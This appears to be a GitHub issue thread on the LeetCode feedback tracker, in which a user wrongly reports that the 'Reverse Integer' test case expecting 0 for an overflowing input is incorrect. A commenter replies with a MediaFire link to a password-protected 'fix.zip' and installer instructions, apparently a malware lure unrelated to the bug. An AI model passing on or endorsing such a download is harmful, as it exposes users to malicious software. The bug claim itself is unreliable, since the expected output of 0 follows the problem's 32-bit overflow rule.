### ISSUE TITLE
[BUG] - <title>

### ISSUE THREAD

**Issue by flaber** [LeetCode-Feedback/LeetCode-Feedback#23711]
### LeetCode Username

user5875qf

### Problem Number, Title, and Link

7. Reverse Integer - Cashe proble

### Bug Category

Incorrect test case *(Output of test case is incorrect as per the problem statement)*

### Bug Description

For test case 1036, for input 1534236469
test case expects 0, where it should be 9646324351

### Language Used for Code

PHP

### Code used for Submit/Run operation

```bash
class Solution {

    /**
     * @param Integer $x
     * @return Integer
     */
    function reverse($x) {
        if($x < 0){

            return intval("-". strrev( substr("".$x,1,strlen($x))) );

        }else{  
            return intval(strrev($x));
        }
    }
}
```

### Expected behavior

for parameter should accept 1534236469 answer 9646324351 

### Screenshots

![image](https://github.com/user-attachments/assets/dcc82960-c175-4cce-95bc-8ccd3a9868b0)

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by flaber** [comment]
Thank you very much for realising me that I am dumb ;)

And impressed with quick response!

Marek Wawro
